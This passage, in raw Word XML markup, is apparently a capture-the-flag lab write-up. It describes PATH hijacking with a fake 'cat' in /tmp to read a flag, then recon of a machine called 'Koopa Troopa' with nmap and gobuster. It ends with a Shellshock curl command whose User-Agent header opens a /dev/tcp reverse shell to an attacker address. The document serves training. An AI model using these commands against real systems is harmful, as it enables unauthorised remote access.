      <w:r w:rsidR="00F72011" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so</w:t>
      </w:r>
      <w:r w:rsidR="00D132E1" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>placed a fake command in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF2532" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F5345" w14:textId="77777777" w:rsidR="006248E9" w:rsidRPr="006248E9" w:rsidRDefault="00F36D10" w:rsidP="006248E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006248E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We created a malicious 'cat' file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50714686" w14:textId="32554E28" w:rsidR="006248E9" w:rsidRPr="006248E9" w:rsidRDefault="00CC4F57" w:rsidP="006248E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>made it executable</w:t>
      </w:r>
      <w:r w:rsidR="312E6E30" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="312E6E30" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="312E6E30" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x</w:t>
      </w:r>
      <w:r w:rsidR="312E6E30" w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4931605B" w14:textId="417FC227" w:rsidR="006248E9" w:rsidRPr="006248E9" w:rsidRDefault="00817D96" w:rsidP="006248E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006248E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ensure path is still set</w:t>
      </w:r>
      <w:r w:rsidR="007E080D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EF782" w14:textId="76EBAE0B" w:rsidR="00F36D10" w:rsidRPr="006248E9" w:rsidRDefault="00EA58F2" w:rsidP="006248E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006248E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
      <w:r w:rsidR="00FB2B5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> you</w:t>
      </w:r>
      <w:r w:rsidRPr="006248E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> run the tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF912C9" w14:textId="77777777" w:rsidR="00FB2B5F" w:rsidRDefault="00FB2B5F" w:rsidP="007B3A33">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADDA341" w14:textId="21E891B1" w:rsidR="005471C4" w:rsidRDefault="003F05E2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2451517A" wp14:editId="17971016">
            <wp:extent cx="5731510" cy="1565910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14277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8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B348" w14:textId="77777777" w:rsidR="007F5667" w:rsidRDefault="007F5667">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36DCCEDB" w14:textId="1BDFEF21" w:rsidR="2AF110C2" w:rsidRPr="007F5667" w:rsidRDefault="2AF110C2" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We c</w:t>
      </w:r>
      <w:r w:rsidR="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5667">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> now read the file and see the flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4243B5" w14:textId="5EF5BD9E" w:rsidR="52E3155C" w:rsidRDefault="52E3155C" w:rsidP="52E3155C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D78DE1B" w14:textId="34E37225" w:rsidR="00552752" w:rsidRDefault="00FF5A14">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5A14">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="149EBF2C" wp14:editId="2918CAA3">
            <wp:extent cx="2486372" cy="600159"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="130390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8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004B" w14:textId="77777777" w:rsidR="00552752" w:rsidRDefault="00552752">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4257B6D0" w14:textId="6BD90A52" w:rsidR="007561B2" w:rsidRPr="0029362E" w:rsidRDefault="007561B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="52E3155C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D475BB" w14:textId="05B53F82" w:rsidR="00826015" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="24730F8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc1311150662"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Koopa Troopa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="001E8713" w14:textId="77777777" w:rsidR="001045A6" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="00C6772B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc162324609"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="3A33C831" w14:textId="364ECA46" w:rsidR="001045A6" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="00C6772B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc921391540"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Exposed services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="7936774F" w14:textId="621B4EC9" w:rsidR="5F943427" w:rsidRDefault="5F943427" w:rsidP="3FECBE25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00033530">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00033530">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00033530">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sTV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00033530">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="27DBC6A1" w:rsidRPr="00033530">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.80.154.109</w:t>
      </w:r>
      <w:r w:rsidRPr="00033530">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>returned 2 services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5F6509" w14:textId="77777777" w:rsidR="3FECBE25" w:rsidRDefault="3FECBE25" w:rsidP="3FECBE25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B0870D" w14:textId="1CC113FD" w:rsidR="5F943427" w:rsidRDefault="5F943427" w:rsidP="3FECBE25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     OpenSSH </w:t>
      </w:r>
      <w:r w:rsidRPr="657FFC6E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.9p1</w:t>
      </w:r>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubuntu </w:t>
      </w:r>
      <w:r w:rsidRPr="3E4CCD7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5ubuntu0.110</w:t>
      </w:r>
      <w:r w:rsidRPr="3FECBE25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF460EB" w14:textId="63132C23" w:rsidR="5F943427" w:rsidRDefault="5F943427" w:rsidP="3FECBE25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="28F50427">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="28F50427">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="28F50427">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="28F50427">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:r w:rsidRPr="28F50427">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="28F50427">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Apache httpd 2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="20E0E03B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="20E0E03B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="28F50427">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ((</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="28F50427">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18335EFC" w14:textId="7987670E" w:rsidR="3FECBE25" w:rsidRDefault="3FECBE25"/>
    <w:p w14:paraId="1B007EB3" w14:textId="34278C9B" w:rsidR="37B390B5" w:rsidRDefault="45C8716E" w:rsidP="37B390B5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16216DAA" wp14:editId="3347E5CC">
            <wp:extent cx="5724525" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="239674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4138" name="Picture 2396741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A671" w14:textId="6668492A" w:rsidR="26353278" w:rsidRDefault="26353278">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745C53D" w14:textId="3B8C1AED" w:rsidR="004C260C" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="00C6772B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc1694954348"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Initial foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="54E2D321" w14:textId="77777777" w:rsidR="004C260C" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="00C6772B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc1174614387"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Initial user access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="19F3AE45" w14:textId="5FBD2211" w:rsidR="00641053" w:rsidRPr="002A29EA" w:rsidRDefault="21C97B5E" w:rsidP="246F665F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A29EA">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A29EA">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A29EA">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A29EA">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://10.80.154.109 -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A29EA">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A29EA">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A29EA">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A29EA">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB03DC7" w14:textId="18D187F6" w:rsidR="00641053" w:rsidRDefault="21C97B5E" w:rsidP="00641053">
      <w:r>
        <w:t>Shows us the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853B8BD" w14:textId="77777777" w:rsidR="007F5667" w:rsidRPr="00F71CAB" w:rsidRDefault="007F5667" w:rsidP="00641053"/>
    <w:p w14:paraId="0DBEB75E" w14:textId="1BA19D88" w:rsidR="00641053" w:rsidRDefault="21C97B5E" w:rsidP="00641053">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6369CD20" wp14:editId="472E385C">
            <wp:extent cx="5724525" cy="2886075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="541700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0932" name="Picture 5417009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74A8" w14:textId="77777777" w:rsidR="007F5667" w:rsidRPr="00A47A23" w:rsidRDefault="007F5667" w:rsidP="00641053"/>
    <w:p w14:paraId="1D8BFE61" w14:textId="473914A4" w:rsidR="1334601B" w:rsidRDefault="070D005B" w:rsidP="1334601B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-bin/ looks promising so we do another </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and find the /test directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CD4486" w14:textId="191AD1B1" w:rsidR="24730F8F" w:rsidRDefault="24730F8F" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FE55B8" w14:textId="6581C18E" w:rsidR="10E8DB1A" w:rsidRDefault="070D005B" w:rsidP="10E8DB1A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46412E43" wp14:editId="4F886300">
            <wp:extent cx="5724525" cy="2533650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1918265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5205" name="Picture 19182652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73EE" w14:textId="70B2B5DF" w:rsidR="10E8DB1A" w:rsidRDefault="10E8DB1A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA3F26" w14:textId="0FA70663" w:rsidR="6D65F634" w:rsidRPr="00222E5C" w:rsidRDefault="070D005B" w:rsidP="6D65F634">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidR="53C701E8" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -H 'User-Agent: () </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="53C701E8" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="53C701E8" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; }; /bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="53C701E8" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="53C701E8" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="53C701E8" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="53C701E8" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/10.80.112.64/1234 0&gt;&amp;1' http://10.80.154.109/cgi-bin/test </w:t>
      </w:r>
      <w:r w:rsidR="34D7BDC0" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we can open a reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="4507A78F" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and u</w:t>
      </w:r>
      <w:r w:rsidR="7AF46D1A" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sing </w:t>
      </w:r>
      <w:r w:rsidR="6BED9A42" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="7AF46D1A" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0332C5FD" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="7AF46D1A" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see the user we get access as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785ABD9A" w14:textId="1E73C597" w:rsidR="24730F8F" w:rsidRDefault="24730F8F" w:rsidP="24730F8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037EBAD7" w14:textId="5385AADB" w:rsidR="0750C011" w:rsidRDefault="357BA881" w:rsidP="497DEFD5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="302A7191" wp14:editId="401DDB63">
            <wp:extent cx="5724525" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="724889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6441" name="Picture 7361164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957" w14:textId="77777777" w:rsidR="00F578A9" w:rsidRDefault="00F578A9" w:rsidP="497DEFD5"/>
    <w:p w14:paraId="0FE49069" w14:textId="7412B100" w:rsidR="00641053" w:rsidRPr="00F71CAB" w:rsidRDefault="4B444F3B" w:rsidP="24730F8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc88281092"/>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>User accounts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="65F50B19" w14:textId="10F47384" w:rsidR="00641053" w:rsidRPr="00801933" w:rsidRDefault="51918FEA" w:rsidP="00641053">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
